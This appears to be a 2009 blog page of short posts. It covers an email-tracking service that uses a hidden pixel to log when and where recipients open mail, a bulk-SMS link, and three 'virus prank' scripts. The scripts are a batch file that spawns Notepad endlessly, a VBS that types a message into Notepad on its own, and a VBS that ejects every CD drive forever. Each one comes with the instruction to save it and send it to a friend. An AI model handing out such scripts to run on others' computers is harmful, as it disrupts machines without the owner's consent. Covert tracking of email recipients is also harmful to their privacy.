mail Tracking

6/05/2009 11:33:00 AM Posted In Edit This 0 Comments »

-mail Tracking

If you ever wondered whether mails you sent ever gets read or just sent to trash, you can use a mail tracking service like MailTracking.com which allows email tracking.
They send you a email notification whenever the recipient reads your email. Notification includes many details including following…
* Date and time opened
* Location of recipient (per their ISP city /town)
* How long the email was read for
* How many times your email was opened
* If your email was forwarded, or opened on a different computer

Now how to use this service in simplest way…

Create an account with them first.
Then next time, whenever you send mail to abc@xyz.com just add .mailtracking.com to the email address. So in this case email address will become abc@xyz.com.mailtracking.com
Now whenever abc@xyz.com read your email, you will receive notification mail from mailtracking.comHow it works…
* Basically the change in email address will route email through mailtracking.com' server.
* They add a small (around 3×3 pixel) white image which is almost invisible to human eyes in email body. The image will be hosted on mailtracking servers and a unique image is kept for each email message.
* So when someone opens email that image also get downloaded. Now mailtracking server logs the browser request for image (note that the request goes in background) and thus can mail you details which mentioned above.

Note:MailTracking.com is not free. You can start with free account as I did. You get 25 credits(1 credit = 1 email) in free account.
Till then enjoy
N Happy Surfing………!!!!!!!!!!!

send bulk sms for free

6/04/2009 06:21:00 AM Posted In Edit This 0 Comments »
http://india.timessms.com/sendSMSConfirm.asp

Open Notepad continually in your friend's computer:

6/04/2009 06:16:00 AM Posted In Edit This 0 Comments »
Open Notepad continually in your friend's computer:
Type :

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top




Save it as "Anything.BAT" and send it.

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

6/04/2009 06:16:00 AM Posted In Edit This 0 Comments »
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "



Save it as "Anything.VBS" and send it.

virus pranks

6/04/2009 06:15:00 AM Posted In Edit This 0 Comments »
1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Save it as "Anything.VBS" and send it.